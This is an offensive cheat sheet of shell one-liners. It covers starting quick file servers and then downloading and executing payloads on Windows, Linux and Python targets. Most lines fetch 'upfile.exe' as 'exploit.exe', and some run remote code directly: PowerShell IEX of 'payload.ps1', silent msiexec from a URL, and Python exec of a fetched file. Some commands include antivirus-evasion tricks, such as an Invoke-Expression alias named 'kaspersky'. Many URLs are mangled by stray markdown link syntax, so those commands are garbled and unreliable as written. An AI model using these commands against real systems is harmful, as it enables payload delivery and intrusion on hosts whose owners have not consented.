- Python HTTP
python -m SimpleHTTPServer 8080
- Python3 HTTP
python3 -m http.server 8080
- Python FTP
python -m pyftpdlib -p 8080
- Python3 SMB
python3 impacket-smbserver.py files . -port 8080
- PHP 5.4+
php -S 0.0.0.0:8080
- Ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start'
- Ruby 1.9.2+
ruby -run -e httpd . -p 8080
- busybox httpd
busybox httpd -f -p 8080
Download the files
Windows
- PowerShell - IWR
powershell.exe -Command "Invoke-WebRequest -Uri [http://127.0.0.1:8080/upfile.exe](http://127.0.0.1:8080/upfile.exe) -OutFile exploit.exe"
- PowerShell - IEX
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('[http://127.0.0.1:8080/upfile.exe',](http://127.0.0.1:8080/upfile.exe',) exploit.exe)"
- CMD - Certutil
certutil.exe -urlcache -split -f [http://127.0.0.1:8080/upfile.exe](http://127.0.0.1:8080/upfile.exe) exploit.exe
- CMD - SMB
copy \\127.0.0.1\files\upfile.exe exploit.exe
- Windows Bitsadmin
bitsadmin /rawreturn /transfer down "[http://127.0.0.1:8080/upfile.exe"](http://127.0.0.1:8080/upfile.exe") c:\\exploit.exe
- Windows msiexec
msiexec /q /i [http://127.0.0.1:8080/upfile.exe](http://127.0.0.1:8080/upfile.exe)
msiexec /q /%os:~1,1%[http://127.0.0.1:8080/upfile.exe](http://127.0.0.1:8080/upfile.exe)
- Windows PowerShell
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('[http://127.0.0.1:8080/payload.ps1')](http://127.0.0.1:8080/payload.ps1'))
- Windows IPC$
copy \127.0.0.1\c$\upfile.exe C:\exploit.exe
Linux
- Linux - wget
wget [http://127.0.0.1:8080/upfile.exe](http://127.0.0.1:8080/upfile.exe) -O exploit.exe
- Linux - curl
curl [http://127.0.0.1:8080/upfile.exe](http://127.0.0.1:8080/upfile.exe) -o exploit.exe
python
- Python Download
python -c "import urllib2; exec urllib2.urlopen('[http://127.0.0.1:8080/upfile.exe').read();"](http://127.0.0.1:8080/upfile.exe').read();")